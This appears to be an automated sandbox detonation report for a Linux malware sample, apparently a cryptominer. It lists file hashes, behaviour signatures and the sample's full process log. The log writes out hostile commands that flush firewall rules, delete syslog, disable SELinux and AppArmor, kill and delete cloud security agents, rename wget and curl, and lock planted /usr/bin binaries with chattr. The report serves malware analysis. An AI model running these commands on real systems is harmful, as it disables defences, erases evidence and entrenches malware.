SHA512 933263416baf2c23e158e0590a7777cd6ca0806f7ec181a211b1d63c404feacba1aad10240b7fd08815beaf7ea4c3ac551bafe770f0638f216b14cadd97c3f71

/tmp/ccpJnzPq.s

MD5 b0a374bb13e7a9d3ca175974dca4fe19
SHA1 3bf622822d66bbe3cbe631f080dae8dab0e397eb
SHA256 4b502d69b9fb07165bd69c12fbb68f42cab859b832cc8a301c3f0ec8b4c0997c
SHA512 6b82ef15ef8fee901428abf853161be3594f4d5e04e526eca515b6733785faf7cdff6bf0d8d8a0c57836aa07186e068ba003f09a6dbd31e46894d926122467dd

/tmp/.ice-unix/.../masscan-1.0.4/tmp/out-redis.o

MD5 0ec177f15d6eab045e7e97e6447516ae
SHA1 53c09269f76e75157c17b93b1a3690261ac7e43b
SHA256 771e85a0df5c5bcb1df704f4da5e5b511bd5de4e3f8733dc46a9940a3aea1f88
SHA512 1ee8bdc1049edc3ace678b0e9097aa00fea7e47a068cf165c6010b627121ae7565e3745615232743e9cca59d54c319fcf326233faaa5cbc7f8bf3856da5f960d

/tmp/ccgMdT4y.s

MD5 15cea1015e07677fd447202cd88a055a
SHA1 9084569151e58930a296e43ba07fa5b321d81fe9
SHA256 d349005c79dee78a9995790fa9896e2ed6d7f7073e3c0ce7a88b0a3e377a62c5
SHA512 dd98eae6c9d7c969c7f75f418457d7f92fffb810e1b0f0ac807c2c68057eb106a7b39f2c13b43fee898390b231e9ce3674e986f7e1ae9a30418a6066b2d5f4c2

/tmp/.ice-unix/.../masscan-1.0.4/tmp/proto-udp.o

MD5 8ef52e004aa87fc095534c2c9789b565
SHA1 58bf6a6697762e06ede3b557f1594319c0d60648
SHA256 e558f3a96ed259ac82d3c525085239ea2d0dcacafc79e1cfb14eef384a138452
SHA512 cf2cae8da99c8ae10ad131ba107c9a416d9d03c8b64887a56372e795a648bb7850e2b51927fe788abf863623fb8c2b7173d522cfcdba5ffd9645aa928e3e4851

/tmp/cclvgUCE.s

MD5 633097905cc9e2fdeb08e640de110724
SHA1 843cd3705ae09b7c6fd116264f3b2c05d2d714a1
SHA256 834e09cece289a01e6323877192bfdbce067e1d59be9829d480db78eada2541d
SHA512 c540f791154f948795edc8ab7c30fbad279de175874cc6c568ed4c60d881f47f96e3a940e9f32203e914d81e3548c9040ad9f19257361075f08caf0de945b54d

/tmp/.ice-unix/.../masscan-1.0.4/tmp/proto-arp.o

MD5 b8f1b2311cf208f9a0cff530f200b4d4
SHA1 5acc0843aa78125204e38b8407d6a286c8200da9
SHA256 aab94afa2cd9e3b740bf0b1d6772933886e78c6ebf09e575a346ba039c26e86f
SHA512 826aad39eb5ecee63291db722ab691e736152e15b6cdbb6fd965e6f63d35a37447ed89e247b39600598d02d36d5e078088bd3a0fc3587b8362619a8811fc1511

/tmp/ccC4H6YK.s

MD5 f573abec6e925e416e3b13be00ca0006
SHA1 f4959ea55cac882c81f55e1817157dc413c21e2d
SHA256 1338dfa33a5931b8675faf42ca4b98c82e964f8379ef6aac3d1a166a4d9972b6
SHA512 587e1a20acfe60091d629a9e575cfd8039290cddea50e99ed2150f10aeba2fda55240f0348f8ecebf86ace0b4c9b5b37bca9bb3c1485eb1321fea75624554d7b

/tmp/.ice-unix/.../masscan-1.0.4/tmp/proto-ftp.o

MD5 ab754c110d1744bc7812291604f9ab07
SHA1 331adac3d9ffbfd57e2e04d25b896b0b0b3e57bc
SHA256 2d15beb5d3ad08a0b78f596c46a55a5655f06d7bb35c6a546c72cfb7600eacc1
SHA512 5b1c1ebb2377f9f12e40c3573c47f10477350b4a371c823fe672636b596d9dc88b5e12c41118b5524ca959f8c06fd753ca8e26a905026550088959f1d2eecbbb

/tmp/ccjSWTPO.s

MD5 1e21326933156c34d340b5cfd3f83285
SHA1 2a03a8ef185d2f4b5ae3b7bdca30e2d5f635346d
SHA256 329f07c08e0e82127372f08e421424ebdf2c053750e3ca6117dfb4b453d2e7c4
SHA512 e48764c7d5e344e31776746bd5225059bfad5ab744e6f5c917b8c683c1558570a3341f00ecb801264117f97f4ed3c31d0af9a9b6c0328d5bf37830f8dc80e619

/tmp/.ice-unix/.../masscan-1.0.4/tmp/rand-primegen.o

MD5 46261df91880d8ecae556452deff1f62
SHA1 d6cc4f49403398c44b626a79553c93e56054edeb
SHA256 321f57c5609fde475839b9032bda096e59cc2857116c81150041fc932d362ce3
SHA512 8e5de70582d9c6e6decd3cd67f3cda5ea83741003e89056876efdd91db56ba3620f679da89ce76dc33d2b499b089602fa34a5854f16775037ed11be72d49fd08

/tmp/ccD4u9Fm.s

MD5 e656cfee737702be88799bd7fd38b3f3
SHA1 eb88192f3afc54dacda36692c4e909374c18a54f
SHA256 b10e42d6b1a3b777a2d2dd36b338ba0616c3d3237799a3d14122d71911697d53
SHA512 bffb543a20237de430dccc11976b7cc71455fecec8336769a088ff8fcc04eb536e524badf6c7d2be7ef9ea907a0a7d8d2343db25b31f0ca20b0efb101b447570

/tmp/.ice-unix/.../masscan-1.0.4/tmp/proto-ssh.o

MD5 d0c4aa0436d600b4ab5b3ef7c28c2e2a
SHA1 4c6db64b9a01df5ea76efff9eb555c599cfa1dba
SHA256 768639745ae7c653cfe9c1fd10e3c36aa84ccc9d17c765221f3921b119810258
SHA512 654bd1ff0d8be238e6b1b1cb08e6bdb9e5e7442e52efa0cb2acb7537a36e6863f9afd04c913ed15bed786514909f5c26eaeb91f341509c5128c77170b7028c2c

/tmp/ccuU22zr.s

MD5 53d23a872eb63773c68535856a652bca
SHA1 17517d1ec64ec5488d49fddc61cfb42bc0fd52ab
SHA256 c803b46ef56fce4af3b909f491d166c1301ffc0b84c2d8dd7fdde990fa513435
SHA512 863eb6a22d17b89c0d5f1dbb440ab5cd011ae338df5b37ef26b907f6b570984fc20b408d3221fe3124557c5e71d29be7d5db661d440aff6b68258e27194775ab

/tmp/.ice-unix/.../masscan-1.0.4/tmp/rawsock-getip.o

MD5 ad251fb90428edcfd84273920a333872
SHA1 81f3992987ab5a8030e9aa4104c9a107e7de2087
SHA256 0ee6ff2b876f64f950eb9ea5f13ab58eddf710efb2d7589313ca72ac613840af
SHA512 1b118bc2640def3e316a873c256fa462d89eb1081c86793e0affd736986f93775d82f5587e4b12a01edba8fc361e2c69b4259f913ebf8b05bff8d13dde05b172

/tmp/ccZmo6tw.s

MD5 de79673167ac461d53aed539bf21af3e
SHA1 f0842593b97d29ee24069ec6b94650228f04a691
SHA256 5fb20c965e0c2bb9551be96370cf68ceb59ba2806ccb4d38d800b8b1b5e742ca
SHA512 fe8dce4cba4956d2fa4728eb53a6b8fefc9f43dd4bbf3b4aec1e27db0dd18cfab37443a0fba682a0fbaffd24e3a58f83c8d7f22e99bd8affd0795f12ecabaf7b

/tmp/.ice-unix/.../masscan-1.0.4/tmp/rand-lcg.o

MD5 a669bb211213f0467044fa9025bb142c
SHA1 6706af3d73617bfe852bb63b55de29bc24ebf020
SHA256 cdc727d781999fee8ea138588b9b72e73f8683a4d5d648dff2c833aa49740835
SHA512 3f6e56d3ce6cff526ad3d44a8544a06e6fbd30764c0bf72594a485b5486dd7d723f8c6001a836092c3f9bde6d877decfb681d9cbd2d5bb28103317940c0bb864

/tmp/cc4CXtyJ.s

MD5 3f37f79562af757a615ff2894d53bb6f
SHA1 98b2c31d5b4738b9549768925d05d6e89e56564e
SHA256 e08508096765193ada620d8f3b9d8568bee2d91c91c968d7c6434cbeaec90c6a
SHA512 49b5425d022ba24e64ea6b0173efa3736f1202fcd6ae26164c0f0dbf7ba96f8b4c4795872670c8cb4d7b72e6810a351272794691ddb427910bd8ba5b16de00a0

/tmp/.ice-unix/.../masscan-1.0.4/tmp/proto-banout.o

MD5 f95dfc40150a45d19b6236ede8973b2a
SHA1 65b7b409eae5dca68dab2ddee6ed1e5e4d7bd632
SHA256 a55c75ad58f947dcde692be12027beede61a4fa39e5e11a746a522b3076ac9f9
SHA512 0c6b58606ac8ca6c65103b089cb515a331620f26e7c059b4e37179802e103eafc4f7363dadfaec3f1659dc4d83ad3cf2f78083987104985a07c11401ed5a9d33

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-30 01:04

Reported

2024-06-30 01:06

Platform

debian9-armhf-20240611-en

Max time kernel

50s

Command Line

[/tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown]

Signatures

Deletes system logs

evasion
Description Indicator Process Target
File deleted /var/log/syslog /bin/rm N/A

Flushes firewall rules

Description Indicator Process Target
N/A N/A /sbin/iptables N/A

Attempts to change immutable files

Description Indicator Process Target
N/A N/A /usr/bin/chattr N/A
N/A N/A /bin/grep N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /bin/grep N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A

Disables AppArmor

Description Indicator Process Target
N/A N/A /usr/bin/systemctl N/A
N/A N/A /bin/systemctl N/A
N/A N/A /sbin/systemctl N/A
N/A N/A /usr/local/sbin/systemctl N/A
N/A N/A /usr/sbin/systemctl N/A
N/A N/A /usr/local/sbin/systemctl N/A
N/A N/A /usr/local/bin/systemctl N/A
N/A N/A /usr/bin/systemctl N/A
N/A N/A /bin/systemctl N/A
N/A N/A /bin/systemctl N/A
N/A N/A /usr/sbin/systemctl N/A
N/A N/A /usr/local/bin/systemctl N/A
N/A N/A /sbin/systemctl N/A
N/A N/A /bin/systemctl N/A
N/A N/A /bin/systemctl N/A
N/A N/A /bin/systemctl N/A

Disables SELinux

Description Indicator Process Target
N/A N/A /usr/sbin/setenforce N/A

Enumerates running processes

Write file to user bin folder

Description Indicator Process Target
File opened for modification /usr/bin/pamdicks /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A
File opened for modification /usr/bin/ip6network /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A
File opened for modification /usr/bin/kswaped /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A
File opened for modification /usr/bin/irqbalanced /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A
File opened for modification /usr/bin/rctlcli /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A
File opened for modification /usr/bin/systemd-network /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A

Reads CPU attributes

Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /sbin/sysctl N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A

Enumerates kernel/hardware configuration

Description Indicator Process Target
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/411/status /bin/ps N/A
File opened for reading /proc/82/stat /bin/ps N/A
File opened for reading /proc/457/cmdline /bin/ps N/A
File opened for reading /proc/7/stat /bin/ps N/A
File opened for reading /proc/7/status /bin/ps N/A
File opened for reading /proc/14/stat /bin/ps N/A
File opened for reading /proc/14/cmdline /bin/ps N/A
File opened for reading /proc/457/stat /bin/ps N/A
File opened for reading /proc/144/cmdline /bin/ps N/A
File opened for reading /proc/24/status /bin/ps N/A
File opened for reading /proc/318/stat /bin/ps N/A
File opened for reading /proc/103/stat /bin/ps N/A
File opened for reading /proc/653/cmdline /bin/ps N/A
File opened for reading /proc/818/status /bin/ps N/A
File opened for reading /proc/4/cmdline /bin/ps N/A
File opened for reading /proc/4/status /bin/ps N/A
File opened for reading /proc/291/stat /bin/ps N/A
File opened for reading /proc/411/stat /bin/ps N/A
File opened for reading /proc/self/fd /usr/bin/xargs N/A
File opened for reading /proc/175/cmdline /bin/ps N/A
File opened for reading /proc/18/stat /bin/ps N/A
File opened for reading /proc/1/status /bin/ps N/A
File opened for reading /proc/395/cmdline /bin/ps N/A
File opened for reading /proc/10/stat /bin/ps N/A
File opened for reading /proc/669/stat /bin/ps N/A
File opened for reading /proc/309/stat /bin/ps N/A
File opened for reading /proc/746/cmdline /bin/ps N/A
File opened for reading /proc/112/cmdline /bin/ps N/A
File opened for reading /proc/411/stat /bin/ps N/A
File opened for reading /proc/4/stat /bin/ps N/A
File opened for reading /proc/103/status /bin/ps N/A
File opened for reading /proc/395/status /bin/ps N/A
File opened for reading /proc/654/stat /bin/ps N/A
File opened for reading /proc/288/status /bin/ps N/A
File opened for reading /proc/11/stat /bin/ps N/A
File opened for reading /proc/175/stat /bin/ps N/A
File opened for reading /proc/828/cmdline /bin/ps N/A
File opened for reading /proc/103/status /bin/ps N/A
File opened for reading /proc/653/stat /bin/ps N/A
File opened for reading /proc/395/stat /bin/ps N/A
File opened for reading /proc/7/cmdline /bin/ps N/A
File opened for reading /proc/222/stat /bin/ps N/A
File opened for reading /proc/7/stat /bin/ps N/A
File opened for reading /proc/19/stat /bin/ps N/A
File opened for reading /proc/16/cmdline /bin/ps N/A
File opened for reading /proc/849/cmdline /bin/ps N/A
File opened for reading /proc/5/cmdline /bin/ps N/A
File opened for reading /proc/7/stat /bin/ps N/A
File opened for reading /proc/3/stat /bin/ps N/A
File opened for reading /proc/656/cmdline /bin/ps N/A
File opened for reading /proc/810/cmdline /bin/ps N/A
File opened for reading /proc/26/cmdline /bin/ps N/A
File opened for reading /proc/662/stat /bin/ps N/A
File opened for reading /proc/9/stat /bin/ps N/A
File opened for reading /proc/457/status /bin/ps N/A
File opened for reading /proc/meminfo /bin/ps N/A
File opened for reading /proc/411/cmdline /bin/ps N/A
File opened for reading /proc/848/stat /bin/ps N/A
File opened for reading /proc/330/stat /bin/ps N/A
File opened for reading /proc/filesystems /bin/ps N/A
File opened for reading /proc/653/status /bin/ps N/A
File opened for reading /proc/330/stat /bin/ps N/A
File opened for reading /proc/718/stat /bin/ps N/A
File opened for reading /proc/3/stat /bin/ps N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/dev/null /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A

Processes

/tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown

[/tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown]

/bin/chmod

[chmod 777 /usr/bin/chattr]

/bin/chmod

[chmod 777 /bin/chattr]

/usr/bin/chattr

[chattr -iua /tmp/]

/usr/bin/chattr

[chattr -iua /var/tmp/]

/sbin/iptables

[iptables -F]

/usr/bin/chattr

[chattr -iae /root/.ssh/]

/usr/bin/chattr

[chattr -iae /root/.ssh/authorized_keys]

/usr/bin/chattr

[chattr -iua /tmp/]

/usr/bin/chattr

[chattr -iua /var/tmp/]

/bin/rm

[rm -rf /tmp/addres*]

/bin/rm

[rm -rf /tmp/walle*]

/bin/rm

[rm -rf /tmp/keys]

/bin/rm

[rm -rf /var/log/syslog]

/bin/sync

[sync]

/bin/cat

[cat /var/spool/cron/]

/bin/cat

[cat /root/.ssh/authorized_keys]

/bin/mv

[mv /usr/bin/wgettnt /usr/bin/wd1]

/bin/mv

[mv /usr/bin/curltnt /usr/bin/cd1]

/bin/mv

[mv /usr/bin/wget1 /usr/bin/wd1]

/bin/mv

[mv /usr/bin/curl1 /usr/bin/cd1]

/bin/mv

[mv /usr/bin/cur /usr/bin/cd1]

/bin/mv

[mv /usr/bin/cdl /usr/bin/cd1]

/bin/mv

[mv /usr/bin/cdt /usr/bin/cd1]

/bin/mv

[mv /usr/bin/xget /usr/bin/wd1]

/bin/mv

[mv /usr/bin/wge /usr/bin/wd1]

/bin/mv

[mv /usr/bin/wdl /usr/bin/wd1]

/bin/mv

[mv /usr/bin/wdt /usr/bin/wd1]

/bin/mv

[mv /usr/bin/wget /usr/bin/wd1]

/bin/mv

[mv /usr/bin/curl /usr/bin/cd1]

/bin/ps

[ps aux]

/bin/grep

[grep -i [a]liyun]

/bin/grep

[grep -i [y]unjing]

/bin/ps

[ps aux]

/usr/sbin/setenforce

[setenforce 0]

/usr/sbin/service

[service apparmor stop]

/usr/bin/basename

[basename /usr/sbin/service]

/usr/bin/basename

[basename /usr/sbin/service]

/bin/systemctl

[systemctl --quiet is-active multi-user.target]

/bin/systemctl

[systemctl list-unit-files --full --type=socket]

/bin/sed

[sed -ne s/\.socket\s*[a-z]*\s*$/.socket/p]

/usr/local/sbin/systemctl

[systemctl --job-mode=ignore-dependencies stop apparmor.service]

/usr/local/bin/systemctl

[systemctl --job-mode=ignore-dependencies stop apparmor.service]

/usr/sbin/systemctl

[systemctl --job-mode=ignore-dependencies stop apparmor.service]

/usr/bin/systemctl

[systemctl --job-mode=ignore-dependencies stop apparmor.service]

/sbin/systemctl

[systemctl --job-mode=ignore-dependencies stop apparmor.service]

/bin/systemctl

[systemctl --job-mode=ignore-dependencies stop apparmor.service]

/bin/systemctl

[systemctl disable apparmor]

/usr/sbin/service

[service aliyun.service stop]

/usr/bin/basename

[basename /usr/sbin/service]

/usr/bin/basename

[basename /usr/sbin/service]

/bin/systemctl

[systemctl --quiet is-active multi-user.target]

/bin/systemctl

[systemctl list-unit-files --full --type=socket]

/bin/sed

[sed -ne s/\.socket\s*[a-z]*\s*$/.socket/p]

/usr/local/sbin/systemctl

[systemctl --job-mode=ignore-dependencies stop aliyun.service.service]

/usr/local/bin/systemctl

[systemctl --job-mode=ignore-dependencies stop aliyun.service.service]

/usr/sbin/systemctl

[systemctl --job-mode=ignore-dependencies stop aliyun.service.service]

/usr/bin/systemctl

[systemctl --job-mode=ignore-dependencies stop aliyun.service.service]

/sbin/systemctl

[systemctl --job-mode=ignore-dependencies stop aliyun.service.service]

/bin/systemctl

[systemctl --job-mode=ignore-dependencies stop aliyun.service.service]

/bin/systemctl

[systemctl disable aliyun.service]

/bin/ps

[ps aux]

/bin/grep

[grep -v grep]

/bin/grep

[grep aegis]

/usr/bin/awk

[awk {print $2}]

/usr/bin/xargs

[xargs -I % kill -9 %]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/bin/grep

[grep Yun]

/usr/bin/awk

[awk {print $2}]

/usr/bin/xargs

[xargs -I % kill -9 %]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/bin/grep

[grep aegis]

/usr/bin/awk

[awk {print $11}]

/usr/bin/xargs

[xargs dirname]

/usr/bin/xargs

[xargs rm -rf]

/usr/local/sbin/dirname

[dirname]

/usr/local/bin/dirname

[dirname]

/usr/sbin/dirname

[dirname]

/usr/bin/dirname

[dirname]

/usr/local/sbin/rm

[rm -rf]

/usr/local/bin/rm

[rm -rf]

/usr/sbin/rm

[rm -rf]

/usr/bin/rm

[rm -rf]

/sbin/rm

[rm -rf]

/bin/rm

[rm -rf]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/bin/grep

[grep hids]

/usr/bin/awk

[awk {print $11}]

/usr/bin/xargs

[xargs dirname]

/usr/bin/xargs

[xargs rm -rf]

/usr/local/sbin/dirname

[dirname]

/usr/local/bin/dirname

[dirname]

/usr/sbin/dirname

[dirname]

/usr/bin/dirname

[dirname]

/usr/local/sbin/rm

[rm -rf]

/usr/local/bin/rm

[rm -rf]

/usr/sbin/rm

[rm -rf]

/usr/bin/rm

[rm -rf]

/sbin/rm

[rm -rf]

/bin/rm

[rm -rf]

/bin/ps

[ps aux]

/bin/grep

[grep -v grep]

/bin/grep

[grep cloudwalker]

/usr/bin/awk

[awk {print $11}]

/usr/bin/xargs

[xargs dirname]

/usr/bin/xargs

[xargs rm -rf]

/usr/local/sbin/dirname

[dirname]

/usr/local/bin/dirname

[dirname]

/usr/sbin/dirname

[dirname]

/usr/bin/dirname

[dirname]

/usr/local/sbin/rm

[rm -rf]

/usr/local/bin/rm

[rm -rf]

/usr/sbin/rm

[rm -rf]

/usr/bin/rm

[rm -rf]

/sbin/rm

[rm -rf]

/bin/rm

[rm -rf]

/bin/ps

[ps aux]

/bin/grep

[grep -v grep]

/bin/grep

[grep titanagent]

/usr/bin/awk

[awk {print $11}]

/usr/bin/xargs

[xargs dirname]

/usr/bin/xargs

[xargs rm -rf]

/usr/local/sbin/dirname

[dirname]

/usr/local/bin/dirname

[dirname]

/usr/sbin/dirname

[dirname]

/usr/bin/dirname

[dirname]

/usr/local/sbin/rm

[rm -rf]

/usr/local/bin/rm

[rm -rf]

/usr/sbin/rm

[rm -rf]

/usr/bin/rm

[rm -rf]

/sbin/rm

[rm -rf]

/bin/rm

[rm -rf]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/bin/grep

[grep edr]

/usr/bin/awk

[awk {print $2}]

/usr/bin/xargs

[xargs -I {} kill -9 {}]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/bin/grep

[grep aegis]

/usr/bin/awk

[awk {print $2}]

/usr/bin/xargs

[xargs -I {} kill -9 {}]

/bin/ps

[ps aux]

/bin/grep

[grep -v grep]

/bin/grep

[grep Yun]

/usr/bin/awk

[awk {print $2}]

/usr/bin/xargs

[xargs -I {} kill -9 {}]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/bin/grep

[grep hids]

/usr/bin/awk

[awk {print $2}]

/usr/bin/xargs

[xargs -I {} kill -9 {}]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/bin/grep

[grep edr]

/usr/bin/awk

[awk {print $2}]

/usr/bin/xargs

[xargs -I {} kill -9 {}]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/bin/grep

[grep cloudwalker]

/usr/bin/awk

[awk {print $2}]

/usr/bin/xargs

[xargs -I {} kill -9 {}]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/bin/grep

[grep titanagent]

/usr/bin/awk

[awk {print $2}]

/usr/bin/xargs

[xargs -I {} kill -9 {}]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/bin/grep

[grep sgagent]

/usr/bin/awk

[awk {print $2}]

/usr/bin/xargs

[xargs -I {} kill -9 {}]

/bin/ps

[ps aux]

/bin/grep

[grep barad_agent]

/bin/grep

[grep -v grep]

/usr/bin/awk

[awk {print $2}]

/usr/bin/xargs

[xargs -I {} kill -9 {}]

/bin/ps

[ps aux]

/bin/grep

[grep -v grep]

/bin/grep

[grep hostguard]

/usr/bin/awk

[awk {print $2}]

/usr/bin/xargs

[xargs -I {} kill -9 {}]

/bin/rm

[rm -rf /usr/local/aegis]

/bin/sleep

[sleep 1]

/usr/bin/chattr

[chattr -i /usr/bin/ip6network]

/usr/bin/chattr

[chattr -i /usr/bin/kswaped]

/usr/bin/chattr

[chattr -i /usr/bin/irqbalanced]

/usr/bin/chattr

[chattr -i /usr/bin/rctlcli]

/usr/bin/chattr

[chattr -i /usr/bin/systemd-network]

/usr/bin/chattr

[chattr -i /usr/bin/pamdicks]

/usr/bin/chattr

[chattr +i /usr/bin/ip6network]

/usr/bin/chattr

[chattr +i /usr/bin/kswaped]

/usr/bin/chattr

[chattr +i /usr/bin/irqbalanced]

/usr/bin/chattr

[chattr +i /usr/bin/rctlcli]

/usr/bin/chattr

[chattr +i /usr/bin/systemd-network]

/usr/bin/chattr

[chattr +i /usr/bin/pamdicks]

/bin/sleep

[sleep 1]

/bin/rm

[rm -f /tmp/.null]

/sbin/sysctl

[sysctl -w vm.nr_hugepages=128]

/bin/grep

[grep 194.87.139.103]

/usr/bin/awk

[awk {print $7}]

/usr/bin/awk

[awk -F[/] {print $1}]

/usr/bin/xargs

[xargs -I % kill -9 %]

/bin/grep

[grep 185.71.65.238]

/usr/bin/awk

[awk {print $7}]

/usr/bin/awk

[awk -F[/] {print $1}]

/usr/bin/xargs

[xargs -I % kill -9 %]

/bin/grep

[grep 140.82.52.87]

/usr/bin/awk

[awk {print $7}]

/usr/bin/awk

[awk -F[/] {print $1}]

/usr/bin/xargs

[xargs -I % kill -9 %]

/bin/grep

[grep :23]

/usr/bin/awk

[awk {print $7}]

/usr/bin/awk

[awk -F[/] {print $1}]

/usr/bin/xargs

[xargs -I % kill -9 %]

/bin/grep

[grep -v -]

/bin/grep

[grep :143]

/usr/bin/awk

[awk {print $7}]

/usr/bin/awk

[awk -F[/] {print $1}]

/bin/grep

[grep -v -]

/usr/bin/xargs

[xargs -I % kill -9 %]

/bin/grep

[grep :2222]

/usr/bin/awk

[awk {print $7}]

/usr/bin/awk

[awk -F[/] {print $1}]

/bin/grep

[grep -v -]

/usr/bin/xargs

[xargs -I % kill -9 %]

/bin/grep

[grep :3333]

/usr/bin/awk

[awk {print $7}]

/usr/bin/awk

[awk -F[/] {print $1}]

/bin/grep

[grep -v -]

/usr/bin/xargs

[xargs -I % kill -9 %]

/bin/grep

[grep :3389]

/usr/bin/awk

[awk {print $7}]

/usr/bin/awk

[awk -F[/] {print $1}]

/bin/grep

[grep -v -]

/usr/bin/xargs

[xargs -I % kill -9 %]

/bin/grep

[grep :5555]

/usr/bin/awk

[awk {print $7}]

/usr/bin/awk

[awk -F[/] {print $1}]

/bin/grep

[grep -v -]

/usr/bin/xargs

[xargs -I % kill -9 %]

Network

N/A

Files

/etc/zzhs

MD5 b026324c6904b2a9cb4b88d6d61c81d1
SHA1 e5fa44f2b31c1fb553b6021e7360d07d5d91ff5e
SHA256 4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865
SHA512 3abb6677af34ac57c0ca5828fd94f9d886c26ce59a8ce60ecf6778079423dccff1d6f19cb655805d56098e6d38a1a710dee59523eed7511e5a9e4b8ccb3a4686

/usr/bin/kswaped

MD5 26ab0db90d72e28ad0ba1e22ee510510
SHA1 7448d8798a4380162d4b56f9b452e2f6f9e24e7a
SHA256 53c234e5e8472b6ac51c1ae1cab3fe06fad053beb8ebfd8977b010655bfdd3c3
SHA512 63e22ec2fbeebabf005e58fbfb0eee607c4aa417045a68a0cc63767b048e3559268d35e72f367d3b2dbd5dbddf12fc4397762ba149260b3795a0391713bddcd7

/usr/bin/irqbalanced

MD5 6d7fce9fee471194aa8b5b6e47267f03
SHA1 a3db5c13ff90a36963278c6a39e4ee3c22e2a436
SHA256 1121cfccd5913f0a63fec40a6ffd44ea64f9dc135c66634ba001d10bcf4302a2
SHA512 2b59d179d9815994f687383a886ea34109889756efca5ab27318cc67ce2a21261d12fa6fee6b8c716f72214ead55ee0d789d6c35cff977d40ef5728ba9188a80

/usr/bin/rctlcli

MD5 48a24b70a0b376535542b996af517398
SHA1 9c6b057a2b9d96a4067a749ee3b3b0158d390cf1
SHA256 7de1555df0c2700329e815b93b32c571c3ea54dc967b89e81ab73b9972b72d1d
SHA512 db545c410fd0c8ede533d5b0666cd2798ba380bd25b655619cd5fd3a33a255569b3ccc319bfdef3322d8392d894d15c2e6aa2d53346e6ac54eaf5d627bfe6a9a

/usr/bin/systemd-network

MD5 1dcca23355272056f04fe8bf20edfce0
